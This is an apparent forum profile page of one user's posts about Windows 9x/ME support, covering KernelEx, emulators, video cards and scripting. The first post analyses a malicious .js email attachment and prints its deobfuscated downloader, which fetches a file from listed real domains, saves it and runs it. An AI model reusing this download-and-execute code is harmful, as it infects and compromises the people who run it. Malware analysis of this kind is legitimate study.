
jumper
MemberContent Type
Profiles
Forums
Events
Everything posted by jumper
-
Malware .js email attachments - execution on 9x/me ?
jumper replied to Nomen's topic in Windows 9x/ME
I made these small changes and it runs in IE5. <script> ... document.writeln(tz) //this[nbny243()](tz); </script> The numerous functions each return a short string and are declared in jumbled order. The loop calls all functions in the proper order and concatenates the strings into the real script. The call to nbny243 evaluates the full string, causing it execute. The full string is: function dl(fr) { var b = "dickinsonwrestlingclub.com www.fibrasinteticafm.com laterrazzafiorita.it".split(" "); for (var i=0; i 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b+"/document.php?rnd="+fr+"&id="+str, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(8391); dl(5142); dl(2053); -
V5R14 requires: Looks like you'll need to check ebay for V4 or earlier.Update: According to http://www.firstratemold.com/about-us/c19-news/what-is-catia/, Catia never supported non-NT Windows. It also appears to be the type of software that "If you need to ask, you can't afford it." In other words, if you can't afford to buy a dedicated system to run it on, you won't be able to afford the software itself.
-
There's not much to say except the obvious: Outlook is leaking User resources and needs to be restarted more often. I'll add resource monitoring to a future version of the KernelEx debugger.
-
Microsoft XBOX 360 PC-gamepad in Windows 98SE, Not Working!
jumper replied to marcooleo's topic in Windows 9x/ME
Is your game port on the mainboard or a soundcard? If the former, it needs to be enabled in the BIOS setup. -
KernelEx 2022 (Kex22) Test Versions (4.22.26.2)
jumper replied to jumper's topic in Windows 9x Member Projects
Does CamStudio v2.7 (or earlier) work correctly under KernelEx 4.5.2 or earlier versions of KernelEx 4.5.2015? -
Dolphin (and pcsx2 as well) doesn't work on windows 98
jumper replied to junior600's topic in Windows 9x/ME
Thanks. Turns out there isn't actually an error at all! They are calling RaiseException with value 406d1388H to talk to the MS VisualStudio debugger (which they shouldn't be doing in a release version.) The exception is "continuable" meaning the debugger can process it or ignore it and then the app should continue. The workaround is to run them in a debugger. Finesse might do. Edit: -
I just reviewed topic/172888-blurry-screen and it is a must read for the current issue.
-
Dolphin (and pcsx2 as well) doesn't work on windows 98
jumper replied to junior600's topic in Windows 9x/ME
For dolphin-3.0-win32.exe ImportPatcher41 reports: But 007b41a3 isn't a valid address in Dolphin 3.0, and now I see this error text doesn't match the original screencap, so you gave the error text for a different version! wrong error text! (However, the opcode bytes do match so maybe I can get a headstart on the debugging while I await the correct error text....) >(the same error message shows with pcsx2) No it doesn'tThe error code might be the same, but the message details will differ somewhat ....Please provide that error text and a link to that app as well. Edit: Removed some of the late-night gruff. -
Both video cards are GeForce, but different chipsets.... Contact Asus and MSI concerning DVI-D compatibility with the two different GeForce chipsets. The GeForce4 might not fully support all features of the latest version of DVI-D. If this is a known issue, their engineers (of either company) might have a (unsupported) software utility for you to try. As for a workaround, once the monitor has been booted with Win7 and is working correctly, don't power it off! Let it hibernate when the PC's are off.
-
Dolphin (and pcsx2 as well) doesn't work on windows 98
jumper replied to junior600's topic in Windows 9x/ME
And what is the full text (not screencap) of that error message? -
DeviceIOControl should do it, but needs a handle from CreateFile and the PlatformSDK (Feb.2003) says: "Windows Me/98/95: You cannot open a directory, physical disk, or volume using CreateFile." This is likely the reason SetupDiEnumDevice* is failing on 9x. But we can send control codes directly to VxD's such as VMM32.vxd and IFSMGR.vxd: Calling DeviceIOControl on Windows Me/98/95 edit: Waybacked the link
-
From MSDevStudio97 (VC5) help: and
-
>mounting a virtual partition. Please tell us more about this.
-
What video card is in the Win7 system? You might need a similar one in SE.
-
(So a Display Port to DVI or VGA adapter would be needed, but....) The point was to connect the Win7 system to the monitor via DVI to see if it's a problem with the DVI input on the monitor.
-
Connect the Win7 system via DVI (and the SE via Display Port if possible).
-
>when Run i get this Error if KernelEX Compatability mode for XP SP2 isnt set on OpenAL32.dll So what happens when you do set the mode to XP? (also try SE and ME)
-
is there away i can add file extension to flash player from directshow
jumper replied to yugioh47's topic in Software Hangout
In any Explorer window from the menu select: View->Folder Options...->File Types Select the "MP3 files" entry with extension "M3U" and click Edit... If no existing entry with extension "M3U", click New Type... -
KernelEx 2022 (Kex22) Test Versions (4.22.26.2)
jumper replied to jumper's topic in Windows 9x Member Projects
Yes. Unfortunately, most of the stack dump is consumed by a local string buffer containing: EHS/LHLL9V-PalP D/ yOatacejbEN:tEPEFABFHAAAAAOAAAAABDebugging:Stack dump:01bdee70 7f2f879b ffffffff 4548532f ... ^^^^^^^^DumpPE -disasm Unicows.dll:7F2F84F3 ShellExecuteExW:...7F2F8796 E86927FEFF call fn_7F2DAF047F2F879B 40 inc eax^^^^^^^^Wmpshell thinks it's running on W2K and is calling Shell32:ShellExecuteExW which is being forwarded to Unicows:ShellExecuteExW by Kexbasen.dll. Ideally this would work, so try using the Kexbasen.dll from 4.5.2 in case that's the problem.To avoid the problem, set the mode for Wmpshell and/or Explorer to 98se or BaseEnhancements (DCFG1). I'm still working on ways to make SP3 and Kex compatible. It may be necessary to disable KernelEx on some or all files upgraded or added by SP3. Many of those files adapt their behavior to the OS they're running on. They've been tested to work on 98se without KernelEx, so disabling KernelEx on them shouldn't be a problem and should help. >100% reproducable: Install MPlayer 9.0, SP3 and KEX 2015.9 in any order, double click media file. -> Crash Try installing just WMP9 and test. Then add KernelEx version 4.5.2, defaulting to Disabled. Add SP3 minimum/base install. Add SP3 extras. One at a time add my v4.5.2015.9 builds of: + KernelEx.dll + Kexbases.dll + Kexbasen.dll If any cause a failure, try replacing it from GhostlyDeath build. Later enable KernelEx on only the apps that need it. -
KernelEx 2022 (Kex22) Test Versions (4.22.26.2)
jumper replied to jumper's topic in Windows 9x Member Projects
Disable KernelEx on Wmpshell. And please post the full error text details as requested. I need to know the passed parameters as well as the call stack. -
KernelEx 2022 (Kex22) Test Versions (4.22.26.2)
jumper replied to jumper's topic in Windows 9x Member Projects
Midi files open and play normally in mplayer2.exe when I double-click them. What version/build/package of KernelEx did you install? Please post all the text details (the stack info is very helpful) and I'll look into it. -
Shell.ShutdownWindows doesn't shut down windows, it "[d]isplays the Shut Down Windows dialog box. This is the same as clicking the Start menu and selecting Shut Down." So if the dialog is cancelled, the call will return. Therefore the object should be released as in your sample code (same as on MSDN at above link).
-
Palemoon appears to have scripting disabled. In IE it is likely enabled. Palemoon may also have some truncated files in its cache if your ISP sometimes caps transmission. Try enabling javascript and force reloading of the site (shift-reload or delete cache or whatever is needed in Palemoon).